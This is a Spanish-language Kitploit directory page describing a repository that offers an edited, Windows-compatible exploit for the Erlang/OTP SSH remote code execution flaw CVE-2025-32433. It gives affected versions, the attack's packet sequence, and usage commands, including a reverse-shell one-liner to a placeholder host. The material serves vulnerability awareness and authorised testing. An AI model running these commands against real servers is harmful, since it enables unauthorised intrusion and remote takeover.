Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32433-Exploit-edited — Basado en la versión original:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Reemplazar la marca de verificación Unicode por un carácter ASCII para compatibilidad con Windows | Kitploit
Herramientas/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Basado en la versión original:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Reemplazar la marca de verificación Unicode por un carácter ASCII para compatibilidad con Windows

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 mesesAún no revisado

Exploit CVE-2025-32433 (Compatible con Windows)

Ejecución Remota de Código No Autenticada en SSH de Erlang/OTP

Descripción

Este repositorio contiene un exploit para CVE-2025-32433, una vulnerabilidad crítica de ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP.

Características principales:

  • ✅ Exploit RCE sin autenticación previa
  • ✅ Corregido para compatibilidad con codificación GBK en Windows
  • ✅ Funciona en versiones de Erlang/OTP ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Detalles de la Vulnerabilidad

ID CVE: CVE-2025-32433
Gravedad: Crítica
Impacto: Ejecución Remota de Código No Autenticada

La vulnerabilidad permite a atacantes ejecutar comandos arbitrarios del sistema en servidores SSH de Erlang/OTP sin autenticación, mediante el envío de mensajes SSH especialmente diseñados.

Versiones Afectadas

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 y versiones anteriores (probablemente)

Uso

root@kitploit:~
# Ejecución básica de comandos
python exploit.py -t <ip-objetivo> -p 2222 -c "whoami"

# Ejecutar comando del sistema
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Ejecución de código Erlang puro
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Shell inversa
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/TU_IP/4444 0>&1"

Argumentos

root@kitploit:~
-t, --target    Dirección IP del objetivo (por defecto: 127.0.0.1)
-p, --port      Puerto del objetivo (por defecto: 2222)
-c, --command   Comando del sistema a ejecutar
-e, --erlang    Código Erlang puro a ejecutar

Corrección de Codificación para Windows

Esta versión corrige el problema de codificación presente en el exploit original:

Problema: El exploit original utilizaba el carácter Unicode de marca de verificación (✓, U+2713) que causa errores de codificación GBK en Windows:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Solución: Se reemplazó el carácter Unicode por el carácter ASCII estándar + para lograr compatibilidad entre plataformas.

Detalles Técnicos

El exploit funciona mediante:

  1. Establecimiento de la conexión SSH e intercambio de banner
  2. Envío del paquete SSH_MSG_KEXINIT
  3. Apertura de un canal SSH con SSH_MSG_CHANNEL_OPEN
  4. Envío de SSH_MSG_CHANNEL_REQUEST con un comando exec malicioso antes de la autenticación
  5. Ejecución de código Erlang arbitrario mediante os:cmd()

Referencias

  • Aviso de Seguridad de GitHub
  • Commit de Corrección de Erlang/OTP
  • RFC 4254 - Protocolo de Conexión SSH
  • ProDefense CVE-2025-32433

Versiones Parcheadas

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Aviso Legal

Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsalo de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.

Licencia

Licencia MIT

Autor

Modificado para compatibilidad con Windows por chuzouX

Descargar herramienta